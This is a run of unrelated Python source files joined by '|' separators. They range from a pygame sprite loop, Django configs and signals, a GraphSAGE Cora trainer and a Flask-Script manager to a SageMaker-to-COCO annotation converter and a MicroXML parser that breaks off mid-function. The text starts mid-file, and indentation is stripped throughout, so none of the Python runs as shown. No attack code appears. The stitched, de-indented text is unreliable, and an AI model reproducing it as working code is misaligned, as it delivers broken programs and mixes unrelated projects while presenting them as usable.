sys.exit()
if event.type == VIDEORESIZE:
screen = pygame.display.set_mode(event.size, RESIZABLE)
size = width, height = event.size
jme = jaime.Jaime(speed, size, pos, jme.turn)
screen.fill(BLACK)
jme.move()
pos = jme.rect.left, jme.rect.top
screen.blit(jme.image_list[index], jme.rect)
pygame.display.update()
clock.tick(30)
if not (num % 5):
if index >= 4:
index = 0
else:
index += 1
if num <= 0:
num = 360
else:
num -= 1 |
from django.apps import AppConfig
class ReplyConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'reply'
|
import runpy
from setuptools import setup, find_packages
__version__ = runpy.run_path("batchlib/__version__.py")["__version__"]
setup(
name="batchlib",
packages=find_packages(exclude=["test"]),
version=__version__,
url="https://github.com/hci-unihd/batchlib.git",
author="Constantin Pape, Roman Remme, Adrian Wolny, Steffen Wolf, Lorenzo Cerrone"
)
|
# Biased Covering Array Algorithm - Andrew Ragland - 2021
import itertools
import random
# calculate a candidate's benefit value
def calc_candidate_benefit(tuples, candidate):
can_benefit = 0
tuple_count = 0
pairs = list(itertools.combinations(candidate, 2))
for pair in pairs:
for tup in list(tuples.items()):
if tup[0] == pair:
can_benefit += tup[1]
tuple_count += 1
return can_benefit, tuple_count
# build a candidate out of a list of pairs
def build_candidate(cvr, pairs):
candidate = [-1] * len(cvr)
for pair in pairs:
for fct in cvr:
if pair[0] in fct:
candidate[cvr.index(fct)] = pair[0]
elif pair[1] in fct:
candidate[cvr.index(fct)] = pair[1]
return candidate
# perform pair generation using the recursive method
def two_way_recursion(depth, t, b, f, tuples, cvr, bft):
if depth == 2:
tuples.update({t: b})
else:
for fct in range(f, len(cvr)):
for lvl in cvr[fct]:
nest_t = t + (lvl,)
nest_b = round(b * bft[fct][cvr[fct].index(lvl)], 2)
two_way_recursion(depth + 1, nest_t, nest_b, fct + 1, tuples, cvr, bft)
def generate_biased_suite(covering_array, benefit_array, exclusion_array):
cover_arr = covering_array
benefit_arr = benefit_array
exclusions = exclusion_array
tuples = dict()
test_suite = []
two_way_recursion(0, (), 1, 0, tuples, cover_arr, benefit_arr)
# exclusions - remove excluded pairs from the list of tuples
if exclusions:
for e in exclusions:
tuples.pop(e)
tuples = dict(sorted(tuples.items(), key=lambda item: item[1], reverse=True))
while tuples:
# store pairs where their benefit values are both maximum and equal
eq_benefit_list = []
eq_benefit_val = list(tuples.items())[0][1]
factor_order = list(range(len(cover_arr)))
random.shuffle(factor_order)
for t in list(tuples.items()):
if t[1] < eq_benefit_val:
break
else:
eq_benefit_list.append(t[0])
# random check
init_tuple = random.choice(eq_benefit_list)
init_can = build_candidate(cover_arr, [init_tuple])
best_can = []
for f in factor_order:
max_benefit = 0
max_count = 0
if init_can[f] == -1:
for val in cover_arr[f]:
init_can[f] = val
benefit, count = calc_candidate_benefit(tuples, init_can)
if benefit > max_benefit or count > max_count:
best_can = init_can.copy()
max_benefit = benefit
max_count = count
# perform exclusions
pairs = list(itertools.combinations(best_can, 2))
final_can = []
for p in pairs:
if p in exclusions:
# start exclusion process, determine pair indicies
exc_benefit = 0
exc_count = 0
indices = [-1] * 2
for i in range(len(cover_arr)):
if p[0] in cover_arr[i]:
indices[0] = i
elif p[1] in cover_arr[i]:
indices[1] = i
for ind in indices:
exc_can = best_can.copy()
for val in cover_arr[ind]:
if val not in p:
exc_can[ind] = val
benefit, count = calc_candidate_benefit(tuples, exc_can)
if benefit > exc_benefit or count > exc_count:
final_can = exc_can.copy()
exc_benefit = benefit
exc_count = count
else:
final_can = best_can.copy()
#
final_pairs = list(itertools.combinations(final_can, 2))
for p in final_pairs:
for t in list(tuples.items()):
if t[0] == p:
tuples.pop(t[0])
break
if final_can:
test_suite.append(final_can)
return test_suite
|
import numpy as np
from opexebo import errors
def walk_filter(speed:np.ndarray, speed_cutoff:float, *args, fmt="remove"):
"""
It is common practice when studying a freely moving subject to exclude data
from periods when the subject was stationary, or nearly stationary. This
method is described as a "walk-filter" - a high-pass filter on subject speed.
This function allows an arbitrary number of arrays to be filtered in parallel
to the speed (or whatever other filtering criteria are used). Filters can be
performed either by removing the unwanted elements, or by masking them and
retunring a MaskedArray.
Example
-------
Filter speed only
>>> speed = np.arange(500)
>>> cutoff = 200
>>> speed = walk_filter(speed, cutoff, fmt="remove")
>>> speed.size
300
Filter other arrays as well
>>> speed = np.arange(500)
>>> cutoff = 200
>>> pos_x = np.linspace(-25, 73, speed.size)
>>> pos_y = np.linspace(0, 98, speed.size)
>>> speed, pos_x, pos_y = walk_filter(speed, cutoff, pos_x, pos_y, fmt="remove")
>>> speed.size
300
>>> pos_x.size
300
Parameters
----------
speed : np.ndarray
Array of speeds for other data points
speed_cutoff : float
The cutoff, below which values in ``speed`` will be excluded.
*args : np.ndarray, optional
Any other arrays that should be filtered in parallel with speed
Optional arguments here _must_ be np.ndarrays with size equal to that of
``speed``
fmt : str, optional
Either "remove" or "mask". Determines how the values are returned
"remove" (default) - the invalid valaues are removed from the array
"mask" - the original array is returned as a MaskedArray, with the invalid
values masked out.
Returns
-------
np.ndarray
Filtered copy of ``speed``
[np.ndarray]
Arbitrary other filtered arrays, if any other arrays were provided as *args
"""
if not isinstance(speed, np.ndarray):
raise errors.ArgumentError("`speed` should be an ndarray, not ({})".format(type(speed)))
if not isinstance(speed_cutoff, (float, int)):
raise errors.ArgumentError("`speed_cutoff` should be a numeric value ({})".format(type(speed_cutoff)))
if speed_cutoff <= 0 or not np.isfinite(speed_cutoff):
raise errors.ArgumentError("\speed_cutoff` should be a finite positive value")
if fmt.lower() not in ("remove", "mask"):
raise errors.ArgumentError("`fmt` should be either 'remove' or 'mask'")
if len(args):
for i, arg in enumerate(args):
if not isinstance(arg, np.ndarray):
raise errors.ArgumentError(f"`arg {i} is not a Numpy array ({arg})")
if not arg.shape == speed.shape:
raise errors.ArgumentError(f"`arg {i} is a different size to `speed`")
good = speed >= speed_cutoff
if fmt.lower() == "mask":
bad = np.logical_not(good)
speed = np.ma.masked_where(bad, speed)
out_args = [np.ma.masked_where(bad, arg) for arg in args]
elif fmt.lower() == "remove":
speed = speed[good]
out_args = [arg[good] for arg in args]
if out_args:
out_args.insert(0, speed)
return out_args
else:
return speed
|
import torch
import torch.nn as nn
from torch.nn import init
from torch.autograd import Variable
import numpy as np
import time
import random
from sklearn.metrics import f1_score
from collections import defaultdict
from graphsage.encoders import Encoder
from graphsage.aggregators import MeanAggregator
"""
Simple supervised GraphSAGE model for directed graph as well as examples running the model
on the Cora datasets.
"""
class SupervisedGraphSage(nn.Module):
def __init__(self, num_classes, enc):
super(SupervisedGraphSage, self).__init__()
self.enc = enc
self.xent = nn.CrossEntropyLoss()
self.weight = nn.Parameter(torch.FloatTensor(num_classes, enc.embed_dim))
init.xavier_uniform(self.weight)
def forward(self, nodes):
embeds = self.enc(nodes)
scores = self.weight.mm(embeds)
return scores.t()
def loss(self, nodes, labels):
scores = self.forward(nodes)
return self.xent(scores, labels.squeeze())
def load_cora():
num_nodes = 2708
num_feats = 1433
feat_data = np.zeros((num_nodes, num_feats))
labels = np.empty((num_nodes,1), dtype=np.int64)
node_map = {}
label_map = {}
with open("cora/cora.content") as fp:
for i,line in enumerate(fp):
info = line.strip().split()
feat_data[i,:] = list(map(float, info[1:-1]))
node_map[info[0]] = i
if not info[-1] in label_map:
label_map[info[-1]] = len(label_map)
labels[i] = label_map[info[-1]]
adj_lists = defaultdict(lambda: defaultdict(set))
with open("cora/cora.cites") as fp:
for i,line in enumerate(fp):
info = line.strip().split()
paper1 = node_map[info[0]]
paper2 = node_map[info[1]]
adj_lists[paper1]["out"].add(paper2)
adj_lists[paper2]["in"].add(paper1)
return feat_data, labels, adj_lists
def run_cora():
np.random.seed(1)
random.seed(1)
num_nodes = 2708
feat_data, labels, adj_lists = load_cora()
features = nn.Embedding(2708, 1433)
features.weight = nn.Parameter(torch.FloatTensor(feat_data), requires_grad=False)
# features.cuda()
agg1 = MeanAggregator(features, cuda=True)
enc1 = Encoder(features, 1433, 128, adj_lists, agg1, gcn=False, cuda=False)
agg2 = MeanAggregator(lambda nodes : enc1(nodes).t(), cuda=False)
enc2 = Encoder(lambda nodes : enc1(nodes).t(), enc1.embed_dim, 128, adj_lists, agg2,
base_model=enc1, gcn=False, cuda=False)
enc1.num_samples = 5
enc2.num_samples = 5
graphsage = SupervisedGraphSage(7, enc2)
# graphsage.cuda()
rand_indices = np.random.permutation(num_nodes)
test = rand_indices[:1000]
val = rand_indices[1000:1500]
train = list(rand_indices[1500:])
optimizer = torch.optim.Adam(filter(lambda p : p.requires_grad, graphsage.parameters()), lr=0.001)
times = []
for batch in range(100):
batch_nodes = train[:256]
random.shuffle(train)
start_time = time.time()
optimizer.zero_grad()
loss = graphsage.loss(batch_nodes,
Variable(torch.LongTensor(labels[np.array(batch_nodes)])))
loss.backward()
optimizer.step()
end_time = time.time()
times.append(end_time-start_time)
print(batch, loss.item())
val_output = graphsage.forward(val)
print("Validation F1:", f1_score(labels[val], val_output.data.numpy().argmax(axis=1), average="micro"))
print("Average batch time:", np.mean(times))
if __name__ == "__main__":
run_cora()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Set of some useful management commands,
based on :py:mod:`script extension <flask.ext.script>`
(:py:class:`flask.ext.Manager`)
A set of scripts, based on :py:mod:`script extension <flask.ext.script>`
that you may find useful.
Amount of commands will constantly grow.
By now, there are:
+-----------------------+-----------------------------------------------------------------+
| **Command** | **Result** |
+=======================+=================================================================+
| runserver | Runs the Flask development server i.e. app.run() |
+-----------------------+-----------------------------------------------------------------+
| shell | Runs interactive shell, ipython if installed |
+-----------------------+-----------------------------------------------------------------+
| init_data | Creates some demo DB-tables and data |
+-----------------------+-----------------------------------------------------------------+
| clean_pyc | Removes all file:`*.pyc` files from the project folder |
+-----------------------+-----------------------------------------------------------------+
.. todo::
Add assets managements, as described in :data:`flask.ext.assets.management-command`
:copyright: \(c) 2012 by Roman Semirook.
:copyright: \(c) 2014 by Michelle Baert.
:license: BSD, see LICENSE for more details.
"""
import subprocess
from flask.ext.script import Shell, Manager
from app import app
from base import User
from ext import db
manager = Manager(app)
"""
The :py:class:`Manager` object from the :py:mod:`script extension <flask.ext.script>`
"""
@manager.command
def clean_pyc():
"""Removes all :file:`*.pyc` files from the project folder"""
clean_command = "find . -name *.pyc -delete".split()
subprocess.call(clean_command)
@manager.command
def init_data():
"""Fish data for project"""
db.drop_all()
db.create_all()
admin = User(username=app.config['ADMIN_USERNAME'], email=app.config['ADMIN_EMAIL'], password=app.config['ADMIN_PASSWORD'])
admin.save()
manager.add_command('shell', Shell(make_context=lambda:{'app': app, 'db': db}))
if __name__ == '__main__':
manager.run()
|
from typing import Tuple
from click._unicodefun import click
from exaslct_src.cli.cli import cli
from exaslct_src.cli.common import set_build_config, set_docker_repository_config, run_tasks, add_options, \
import_build_steps
from exaslct_src.cli.options \
import build_options, flavor_options, system_options, release_options, \
docker_repository_options
from exaslct_src.lib.export_containers import ExportContainers
@cli.command()
@add_options(flavor_options)
@add_options(release_options)
@click.option('--export-path', type=click.Path(exists=False, file_okay=False, dir_okay=True), default=None)
@click.option('--release-name', type=str, default=None)
@add_options(build_options)
@add_options(docker_repository_options)
@add_options(system_options)
def export(flavor_path: Tuple[str, ...],
release_type: str,
export_path: str,
release_name: str,
force_rebuild: bool,
force_rebuild_from: Tuple[str, ...],
force_pull: bool,
output_directory: str,
temporary_base_directory: str,
log_build_context_content: bool,
cache_directory: str,
build_name: str,
source_docker_repository_name: str,
source_docker_tag_prefix: str,
source_docker_username: str,
source_docker_password: str,
target_docker_repository_name: str,
target_docker_tag_prefix: str,
target_docker_username: str,
target_docker_password: str,
workers: int,
task_dependencies_dot_file: str):
"""
This command exports the whole script language container package of the flavor,
ready for the upload into the bucketfs. If the stages do not exists locally,
the system will build or pull them before the exporting the packaged container.
"""
import_build_steps(flavor_path)
set_build_config(force_rebuild,
force_rebuild_from,
force_pull,
log_build_context_content,
output_directory,
temporary_base_directory,
cache_directory,
build_name)
set_docker_repository_config(source_docker_password, source_docker_repository_name, source_docker_username,
source_docker_tag_prefix, "source")
set_docker_repository_config(target_docker_password, target_docker_repository_name, target_docker_username,
target_docker_tag_prefix, "target")
tasks = lambda: [ExportContainers(flavor_paths=list(flavor_path),
release_types=list([release_type]),
export_path=export_path,
release_name=release_name
)]
def on_success():
with ExportContainers.command_line_output_target.open("r") as f:
print(f.read())
run_tasks(tasks, workers, task_dependencies_dot_file, on_success=on_success)
|
from django.db.models.signals import pre_save, post_save, post_delete
from django.dispatch import receiver
from django.utils import timezone
from slugify import slugify
from .models import Category, Document, FileStatistic
@receiver(pre_save, sender=Document)
def presave_fields(sender, instance, *args, **kwargs):
""" Обычный сигнал для изменения времени публикации и добавление формата документа. """
if instance.is_published and instance.published_at is None:
instance.published_at = timezone.now()
elif not instance.is_published and instance.published_at is not None:
instance.published_at = None
instance.file_format = instance.file.name.split('.')[-1]
@receiver(pre_save, sender=Category)
@receiver(pre_save, sender=Document)
def presave_slug(sender, instance, *args, **kwargs):
""" Обычный сигнал для добавления слага перед сохранением.
Не использую стандартный встроенный в django slugify, потому что он не работает с кириллицей.
"""
if instance.__class__.__name__ == "Document":
instance.slug = slugify(instance.title)
elif instance.__class__.__name__ == "Category":
instance.slug = slugify(instance.name)
@receiver(post_save, sender=Document)
def create_favorites(sender, instance, created, **kwargs):
if created:
statistic = FileStatistic()
statistic.save()
instance.statistic = statistic
instance.save()
@receiver(post_delete, sender=Document)
def delete_statistic(sender, instance, **kwargs):
instance.statistic.delete()
instance.statistic.save()
instance.save() |
import random
import itertools
# from deck_of_cards import deck_of_cards # pip install deck-of-cards
ranks = ("Ace", 2, 3, 4, 5, 6, 7, 8, 9, 10, "Jack", "Queen", "King")
suits = ("Clubs", "Diamonds", "Hearts", "Spades")
cards = list(itertools.product(ranks, suits))
print("\nKāršu kava:\n", cards)
def get_shuffled_cards(cards):
deck = list(cards)
random.shuffle(deck)
print("\nSajauktā kāršu kava:\n", deck)
return deck
def get_random_sample(cards, count=1):
card_list = list(cards)
rs_card = random.sample(card_list, count)
print("\nKārts no vrknes:\n", rs_card)
return rs_card
def get_random_sample_list(cards):
card_list = list(cards)
new_deck = random.sample(card_list, len(card_list))
print("\nJauna sajaukta kāršu kava:\n", new_deck)
return new_deck
my_shuffled_cards = get_shuffled_cards(cards)
random_sample = get_random_sample(cards, 10)
get_random_sample_list(cards)
print(my_shuffled_cards[:10])
print(random_sample)
print(list(itertools.product(range(5), list("abcd"), ["green", "red"]))) |
from PyQt5 import QtWidgets
class MainWindow(QtWidgets.QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
widget = QtWidgets.QWidget()
self.setCentralWidget(widget)
if __name__ == '__main__':
import sys
app = QtWidgets.QApplication(sys.argv)
w = MainWindow()
w.show()
sys.exit(app.exec())
|
import argparse
import base64
import glob
import io
import json
import os
import random
import pycocotools
import cv2
import imageio
from PIL import Image, ImageColor, ImageDraw
import numpy as np
from pycocotools import mask
from skimage import measure
CAT_TO_ID = dict(egg=1, blob=2)
CAT_TO_COLOR = dict(egg="#f00562", blob="#d63526")
def r():
return random.randint(0, 255)
def options():
p = argparse.ArgumentParser(
description="Convert Amazon SageMaker "
+ "instance segmentation data to COCO format"
)
p.add_argument(
"annotDir",
metavar="path/to/annots",
help="path to the "
+ "directory containing the raw annotation data from Amazon",
)
p.add_argument(
"manifest",
metavar="path/to/manifest",
help="path to " + "the manifest file associated with the labelling job",
)
p.add_argument(
"imgsDir",
metavar="path/to/imgs",
help="path to the " + "directory containing all possible training/eval images",
)
p.add_argument(
"--remove_completed_from_manifest",
action="store_true",
help="whether to create a copy of the manifest file in the same folder as"
+ " the current one, removing file name entries corresponding to images that"
+ " have been annotated already.",
)
p.add_argument('--worker_ignore_list', help='path to a newline-separated file of'
+ ' worker IDs whose annotations should be ignored in the annotation data. Any' +
' images completed by these workers will also not be omitted from the new copy of' +
' the manifest file if the --remove_completed_from_manifest option is enabled.')
return p.parse_args()
opts = options()
alphabetizedImgList = [
imgPath for imgPath in sorted(glob.glob(os.path.join(opts.imgsDir, "*.jpg")))
]
alphabetizedImgListBaseNames = [
os.path.basename(imgPath) for imgPath in alphabetizedImgList
]
cocoOutput = dict(annotations=[], categories=[], images=[])
jsonAnnots = glob.glob(os.path.join(opts.annotDir, "*.json"))
with open(opts.manifest) as f:
labelledImgs = [
os.path.basename(json.loads(imgLine)["source-ref"]) for imgLine in f.readlines()
]
print("labeled images before starting iterations")
print(labelledImgs)
if opts.remove_completed_from_manifest:
completed_images = []
if opts.worker_ignore_list:
num_images_ignored = 0
with open(opts.worker_ignore_list) as f:
workers_to_ignore = f.read().splitlines()
instance_id = 0
for jsonFile in jsonAnnots:
with open(jsonFile) as f:
jsonData = json.load(f)
taskName = list(jsonData[0]["consolidatedAnnotation"]["content"].keys())[0]
for image_data in jsonData:
imgName = labelledImgs[int(image_data["datasetObjectId"])]
workerId = image_data['consolidatedAnnotation']['content'][taskName]['annotationsFromAllWorkers'][0]['workerId']
if opts.worker_ignore_list and workerId in workers_to_ignore:
print(f"Skipping image {imgName} because it was completed by ignored worker {workerId}")
num_images_ignored += 1
continue
if opts.remove_completed_from_manifest:
completed_images.append(imgName)
imgId = alphabetizedImgListBaseNames.index(imgName)
annotationData = json.loads(
json.loads(
image_data["consolidatedAnnotation"]["content"][taskName][
"annotationsFromAllWorkers"
][0]["annotationData"]["content"]
)["annotations"]
)
# code correct until this point
if len(cocoOutput["categories"]) == 0 and len(annotationData) > 0:
label = annotationData[0]["class"]
cocoOutput["categories"].append(
{
"id": CAT_TO_ID[label],
"name": label,
"supercategory": "",
"color": CAT_TO_COLOR[label],
"metadata": {},
"keypoint_colors": [],
}
)
img = cv2.imread(alphabetizedImgList[imgId])
# img = imageio.imread(io.BytesIO(base64.b64decode(annotationData[
# 'labeledImage']['pngImageData'])))
# cv2_img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
# # cv2.imshow('testing', cv2_img)
# # cv2.waitKey(0)
imageData = {
"id": imgId,
"path": alphabetizedImgList[imgId],
"height": img.shape[0],
"width": img.shape[1],
"file_name": imgName,
"worker_id": workerId,
"annotated": False,
"annotating": [],
"num_annotations": 0,
"metadata": {},
"deleted": False,
"milliseconds": 0,
"events": [],
"regenerate_thumbnail": False,
}
cocoOutput["images"].append(imageData)
for i, instance in enumerate(annotationData):
runningArea = 0
# polygonPts = np.multiply(np.asarray(instance['data']).flatten(), img.shape[1] / 1200)
# polygonPts = np.multiply(np.asarray([[4, 3, 1, 5], [7, 4, 5, 3]]).flatten(), img.shape[1] / 1200)
# polygonPts = np.multiply(np.asarray([[int(el) for el in annot[
# 'segmentation'][0]]))
polygonPts = np.asarray(instance["points"])
blankImg = Image.new("L", tuple(reversed(img.shape[0:2])), 0)
for j, seg in enumerate(polygonPts):
if j == 0:
ImageDraw.Draw(blankImg).polygon(
[int(el) for el in seg], outline=1, fill=1
)
fortran_ground_truth_binary_mask = np.asfortranarray(blankImg)
encoded_ground_truth = mask.encode(fortran_ground_truth_binary_mask)
runningArea += mask.area(encoded_ground_truth)
ground_truth_bounding_box = mask.toBbox(encoded_ground_truth)
else:
ImageDraw.Draw(blankImg).polygon(
[int(el) for el in seg], outline=i, fill=i
)
fortran_ground_truth_binary_mask = np.asfortranarray(blankImg)
encoded_ground_truth = mask.encode(fortran_ground_truth_binary_mask)
runningArea -= mask.area(encoded_ground_truth)
annotation = {
"segmentation": [],
"metadata": {},
"area": runningArea.tolist(),
"iscrowd": False,
"isbbox": False,
"image_id": imgId,
"bbox": ground_truth_bounding_box.tolist(),
"category_id": CAT_TO_ID[instance["class"]],
"id": instance_id,
"color": "#{:02x}{:02x}{:02x}".format(r(), r(), r()),
}
instance_id += 1
for seg in polygonPts:
annotation["segmentation"].append(seg.tolist())
# for contour in contours:
# contour = np.flip(contour, axis=1)
# segmentation = contour.ravel().tolist()
# annotation["segmentation"].append(segmentation)
# how many levels of nesting are correct?
# only two because each instance can have one or more segmentations
# why are there three levels now?
cocoOutput["annotations"].append(annotation)
# # blankImg = Image.new("L", tuple(reversed(img.shape[0:2])), 0)
# # ImageDraw.Draw(blankImg).polygon([int(el) for el in annotation[
# # 'segmentation'][0]], outline=1, fill=1)
# # reconstructedMask = np.array(blankImg)
# # cv2.imshow('reconstructedMask', 255*reconstructedMask)
# # cv2.waitKey(0)
with open("%s_labels_fromAmzn_%s.json" % (label, taskName), "w") as f:
json.dump(cocoOutput, f, ensure_ascii=False, indent=4)
if opts.remove_completed_from_manifest:
with open(f'{opts.manifest.split(".jsonl")[0]}_amended.jsonl', 'w') as f:
for image_name in labelledImgs:
if image_name not in completed_images:
f.write(f'{{"source-ref":"s3://egg-laying/images/{image_name}"}}\n')
if opts.worker_ignore_list:
print(f'Omitted {num_images_ignored} from the new version of the manifest file.') |
"""
The Building Energy Modeling Extreme Weather Simulator (BEMEWS)
weather module reads in, alters, and writes out weather files
to account for extreme events or climate change.
"""
from mews.weather.alter import Alter
|
#amara3.uxml.parser
'''
Hand-crafted parser for MicroXML [1], inspired to some extent by James Clark's Javascript work [2].
[1] https://dvcs.w3.org/hg/microxml/raw-file/tip/spec/microxml.html
[2] https://github.com/jclark/microxml-js/blob/master/microxml.js
'''
import re
from enum import Enum #https://docs.python.org/3.4/library/enum.html
from amara3.util import coroutine
class state(Enum):
pre_element = 1
in_element = 2
pre_tag_gi = 3
pre_complete_tag_gi = 4
tag_gi = 5
complete_tag = 6
complete_doc = 7
attribute = 8
class event(Enum):
start_element = 1
end_element = 2
characters = 3
BOM = '\uFEFF'
CHARACTER = re.compile('[\u0009\u000a\u0020-\u007e\u00a0-\ud7ff\ue000-\ufdcf\ufdf0-\ufffd' \
'\U00010000-\U0001fffd\U00020000-\U0002fffd\U00030000-\U0003fffd\U00040000-\U0004fffd\U00050000-\U0005fffd\U00060000-\U0006fffd' \
'\U00070000-\U0007fffd\U00080000-\U0008fffd\U00090000-\U0009fffd\U000a0000-\U000afffd\U000b0000-\U000bfffd\U000c0000-\U000cfffd' \
'\U000d0000-\U000dfffd\U000e0000-\U000efffd\U000f0000-\U000ffffd\U00100000-\U0010fffd]')
#MicroXML production [7] Basically CHARACTER - [\u0026\u003C\u003E]
DATACHAR = re.compile('[\u0009\u000a\u0020-\u0025\u0027-\u003B\u003D\u003F-\u007e\u00a0-\ud7ff\ue000-\ufdcf\ufdf0-\ufffd' \
'\U00010000-\U0001fffd\U00020000-\U0002fffd\U00030000-\U0003fffd\U00040000-\U0004fffd\U00050000-\U0005fffd\U00060000-\U0006fffd' \
'\U00070000-\U0007fffd\U00080000-\U0008fffd\U00090000-\U0009fffd\U000a0000-\U000afffd\U000b0000-\U000bfffd\U000c0000-\U000cfffd' \
'\U000d0000-\U000dfffd\U000e0000-\U000efffd\U000f0000-\U000ffffd\U00100000-\U0010fffd]')
NAMESTARTCHAR = re.compile('[A-Za-z_\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D' \
'\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF' \
'\uF900-\uFDCF\uFDF0-\uFFFD\U00010000-\U000EFFFF]')
NAMECHAR = re.compile('[0-9A-Za-z_\u00B7-\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u037D' \
'\u037F-\u1FFF\u200C-\u200D\u203F-\u2040\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF' \
'\uF900-\uFDCF\uFDF0-\uFFFD\U00010000-\U000EFFFF]')
#For single quoted attrs
ATTRIBVALCHAR_SGL = re.compile('[\u0020-\u0025\u0028-\u003B\u003D\u003F-\u007e\u00a0-\ud7ff\ue000-\ufdcf\ufdf0-\ufffd' \
'\U00010000-\U0001fffd\U00020000-\U0002fffd\U00030000-\U0003fffd\U00040000-\U0004fffd\U00050000-\U0005fffd\U00060000-\U0006fffd' \
'\U00070000-\U0007fffd\U00080000-\U0008fffd\U00090000-\U0009fffd\U000a0000-\U000afffd\U000b0000-\U000bfffd\U000c0000-\U000cfffd' \
'\U000d0000-\U000dfffd\U000e0000-\U000efffd\U000f0000-\U000ffffd\U00100000-\U0010fffd]')
#For double quoted attrs
ATTRIBVALCHAR_DBL = re.compile('[\u0020-\u0021\\\u0023-\u0025\u0027-\u003B\u003D\u003F-\u007e\u00a0-\ud7ff\ue000-\ufdcf\ufdf0-\ufffd' \
'\U00010000-\U0001fffd\U00020000-\U0002fffd\U00030000-\U0003fffd\U00040000-\U0004fffd\U00050000-\U0005fffd\U00060000-\U0006fffd' \
'\U00070000-\U0007fffd\U00080000-\U0008fffd\U00090000-\U0009fffd\U000a0000-\U000afffd\U000b0000-\U000bfffd\U000c0000-\U000cfffd' \
'\U000d0000-\U000dfffd\U000e0000-\U000efffd\U000f0000-\U000ffffd\U00100000-\U0010fffd]')
# Tokens
WS = '[\u0009\u000A\u0020]'
HEXCHARENTOK = re.compile('[a-fA-F0-9]')
NAMEDCHARENTOK = re.compile('[a-zA-Z0-9]')
#In order of length
CHARNAMES = (('lt', "<"), ('gt', ">"), ('amp', "&"), ('quot', '"'), ('apos', "'"))
#CHARNAMES = { 'lt': "<", 'gt': ">", 'amp': "&", 'quot': '"', 'apos': "'"}
#Make this one a utility function since we'll hope to make the transition into reading cdata rarely enough to endure the function-call overhead
def handle_cdata(pos, window, charpat, stopchars):
'''
Return (result, new_position) tuple.
Result is cdata string if possible and None if more input is needed
Or of course bad syntax can raise a RuntimeError
'''
cdata = ''
cursor = start = pos
try:
while True:
while charpat.match(window[cursor]):
cursor += 1
addchars = window[start:cursor]
cdata += addchars
#if window[pos] != openattr:
# raise RuntimeError('Mismatch in attribute quotes')
if window[cursor] in stopchars:
return cdata, cursor
#Check for charref
elif window[cursor] == '&':
start = cursor = cursor + 1
if window[cursor] == '#' and window[cursor + 1] == 'x':
#Numerical charref
start = cursor = cursor + 2
while True:
if HEXCHARENTOK.match(window[cursor]):
cursor += 1
elif window[cursor] == ';':
c = chr(int(window[start:cursor], 16))
if not CHARACTER.match(c):
raise RuntimeError('Character reference gives an illegal character: {0}'.format('&' + window[start:cursor] + ';'))
cdata += c
break
else:
raise RuntimeError('Illegal in character entity: {0}'.format(window[cursor]))
else:
#Named charref
while True:
if NAMEDCHARENTOK.match(window[cursor]):
cursor += 1
elif window[cursor] == ';':
for cn, c in CHARNAMES:
if window[start:cursor] == cn:
cdata += c
#cursor += 1 #Skip ;
break
else:
raise RuntimeError('Unknown named character reference: {0}'.format(repr(window[start:cursor])))
break
else:
raise RuntimeError('Illegal in character reference: {0} (around {1})'.format(window[cursor]), error_context(window, start, cursor))
#print(start, cursor, cdata, window[cursor])
cursor += 1
start = cursor
except IndexError:
return None, cursor
def error_context(window, start, end, size=10):
return window[max(0, start-size):min(end+size, len(window))]
@coroutine
def parser(handler, strict=True):
next(handler) #Prime the coroutine
#abspos = 0
line_count = 1
col_count = 1
window = ''
pos = 0
wlen = 0
backtrack = 0
curr_state = state.pre_element
done = False
element_stack = []
attribs = {}
try:
try:
while not done:
#import pdb; pdb.set_trace()
frag, done = yield
#print(frag, done)
if not frag: continue #Ignore empty additions
window += frag
wlen += len(frag)
#FIXME: throw away unneeded, prior bits of window here
need_input = False
while not need_input:
if curr_state == state.pre_element:
#Eat up any whitespace
try:
while window[pos] in ' \r\n\t':
pos += 1
except IndexError:
if not done: need_input = True #Do not advance until we have enough input
continue
#if not done and pos == wlen:
# need_input = True
# continue
if window[pos] == '<':
pos += 1
curr_state = state.pre_tag_gi
#if not done and pos == wlen:
# need_input = True
# continue
if curr_state in (state.pre_tag_gi, state.pre_complete_tag_gi):
pending_event = event.start_element if curr_state == state.pre_tag_gi else event.end_element
#Eat up any whitespace
try:
while window[pos] in ' \r\n\t':
pos += 1
except IndexError:
if not done: need_input = True #Do not advance until we have enough input
continue
if curr_state == state.pre_tag_gi and window[pos] == '/':
pos += 1
curr_state = state.pre_complete_tag_gi
pending_event = event.end_element
continue
#if not done and pos == wlen:
# need_input = True
# continue
advpos = pos
try:
if NAMESTARTCHAR.match(window[advpos]):
advpos += 1
while NAMECHAR.match(window[advpos]):
advpos += 1
except IndexError:
if not done: need_input = True #Do not advance until we have enough input
continue
else:
gi = window[pos:advpos]
pos = advpos
curr_state = state.complete_tag
if curr_state == state.complete_tag:
#Eat up any whitespace
try:
while window[pos] in ' \r\n\t':
pos += 1
except IndexError:
if not done: need_input = True #Do not advance until we have enough input
continue
#Check for attributes
if pending_event == event.start_element and NAMESTARTCHAR.match(window[pos]):
curr_state = state.attribute
#Note: pos not advanced so we can re-read startchar
continue
if window[pos] == '>':
pos += 1
curr_state = state.in_element
attribs_out = attribs.copy()
attribs = {} # Reset attribs
if pending_event == event.start_element:
handler.send((pending_event, gi, attribs_out, element_stack.copy()))
element_stack.append(gi)
else:
opened = element_stack.pop()
if opened != gi:
raise RuntimeError('Expected close element {0}, found {1}'.format(opened, gi))
handler.send((pending_event, gi, element_stack.copy()))
if not element_stack: #and if strict
curr_state = state.complete_doc
if pos == wlen:
if done:
#Error: unfinished business if this is opening tag
break
else:
need_input = True
continue
else:
raise RuntimeError('Expected \'>\', found {0}'.format(window[pos]))
if curr_state == state.attribute:
backtrackpos = pos
advpos = pos+1 #Skip 1st char, which we know is NAMESTARTCHAR
try:
while NAMECHAR.match(window[advpos]):
advpos += 1
except IndexError:
if not done: need_input = True #Do not advance until we have enough input
pos = backtrackpos
continue
else:
aname = window[pos:advpos]
pos = advpos
#Eat up any whitespace
try:
while window[pos] in ' \r\n\t':
pos += 1
except IndexError:
if not done: need_input = True #Do not advance until we have enough input
pos = backtrackpos
continue
if window[pos] == '=':
pos += 1
else:
